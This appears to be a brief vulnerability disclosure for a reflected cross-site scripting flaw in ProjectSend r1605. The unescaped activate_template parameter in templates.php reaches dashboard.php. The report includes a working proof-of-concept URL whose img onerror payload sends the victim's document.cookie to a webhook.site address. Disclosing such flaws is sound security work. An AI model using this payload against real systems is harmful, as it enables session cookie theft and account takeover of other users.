The activate_template
parameter at line 16 of the templates.php
file will be rendered at line 31 of file the dashboard.php
page, without using the html_output()
function.
http://localhost/projectsend-r1605/templates.php?activate_template=<img/src=x+onerror=window.location='https://webhook.site/5e0da962-936d-473e-91c4-9a70a4702779?'%2bdocument.cookie>
dashboard.php
malicious js code will be executed and the cookie will be sent to the attacker’s server